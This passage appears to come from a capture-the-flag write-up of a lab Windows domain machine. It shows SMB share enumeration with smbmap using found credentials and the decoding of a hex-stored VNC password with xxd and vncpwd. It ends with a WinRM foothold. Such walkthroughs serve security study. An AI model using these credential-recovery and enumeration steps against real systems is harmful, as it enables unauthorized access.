SMB

I was able to retrieve a data share with the credentials for ryan.

╰─ smbmap -H 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva'
[+] IP: 10.10.10.182:445	Name: cascade.local                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	Audit$                                            	NO ACCESS	
	C$                                                	NO ACCESS	Default share
	Data                                              	READ ONLY	
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	print$                                            	READ ONLY	Printer Drivers
	SYSVOL                                            	READ ONLY	Logon server share

There was an html file the name of the account for TempAdmin.

-- New production network will be going live on Wednesday so keep an eye out for any issues.

-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).

-- The winner of the β€œBest GPO” competition will be announced on Friday so get your submissions in soon.

There was also a .reg file that allowed me to view a hexed password for VNC.

"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

We have to put the hex in the following format and pass it to the tool called vncpwd. 

╰─ echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass
╭─ ο…Ό  ξ‚± ο„•  /home/kali/vncpwd ξ‚± ο„“   master ?2 ▓▒░──────────────────────────────────────────────░▒▓ βœ” ξ‚³ root@kali ξ‚°
╰─ ./vncpwd vnc_enc_pass 
Password: sT333ve2

Now we have to do the same shit again

I validated the creds with crackmapexec and was able to get a foothold on the machine with winrm

PreviousLDAPNextDNS

Last updated